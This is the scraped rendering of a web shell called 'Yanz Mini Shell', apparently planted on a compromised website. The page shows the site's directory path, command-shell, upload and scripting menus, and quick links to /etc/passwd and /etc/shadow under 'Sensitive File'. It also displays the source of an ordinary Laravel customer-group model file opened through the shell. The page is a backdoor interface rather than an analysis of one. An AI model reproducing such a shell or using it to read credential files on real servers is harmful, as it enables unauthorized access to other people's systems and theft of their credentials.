Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
input-mask
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App; use Illuminate\Database\Eloquent\Model; class CustomerGroup extends Model { protected $casts = [ 'deleted_at' => 'datetime', ]; /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; /** * Return list of customer group for a business * * @param $business_id int * @param $prepend_none = true (boolean) * @param $prepend_all = false (boolean) * @return array */ public static function forDropdown($business_id, $prepend_none = true, $prepend_all = false) { $all_cg = CustomerGroup::where('business_id', $business_id); $all_cg = $all_cg->pluck('name', 'id'); //Prepend none if ($prepend_none) { $all_cg = $all_cg->prepend(__('lang_v1.none'), ''); } //Prepend none if ($prepend_all) { $all_cg = $all_cg->prepend(__('report.all'), ''); } return $all_cg; } }
Free Space : 11801817088 Byte